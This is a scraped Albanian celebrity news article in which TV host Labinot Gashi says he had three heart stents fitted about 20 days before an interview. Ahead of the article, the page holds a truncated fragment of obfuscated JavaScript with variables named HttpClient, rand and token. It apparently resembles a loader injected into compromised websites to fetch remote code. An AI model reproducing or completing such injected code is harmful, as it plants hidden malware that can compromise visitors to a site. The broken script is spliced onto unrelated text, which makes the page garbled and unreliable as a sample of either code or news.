;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Labinot Gashi zbulon intervenimin serioz në zemër

By

Larg vëmendjes së publikut, moderatori shumë i dashur Labi ka kryer një intervenim serioz në zemër.

Para 20 ditësh, atij i janë vendosur tri stenda në zemër. Këtë e tha në një intervistë për “Shqipëria Live”.

“Po e them këtu, nuk kam dashur ta bëj publike edhe aq shumë, po dashur e pa dashur po më duhet ta bëj publike. Ka 20 ditë që e kam pasur një intervenim tek vetvetja dhe unë nuk e kam bërë publike, nuk e kam vendosur në rrjete sociale, kam dashur me e mbajt afër vetës. I kam vendosur tri stenda në zemër dhe po e marr vetën”, tha Labi.

Kujtojmë se moderatori ishte i ftuar në Prive muaj më parë për të zbuluar momentet e tij më të veçanta në jetë.

Ndiqni të plotë intervistën e tij në videon e mëposhtme. /Prive.al

Artikuj të ngjashëm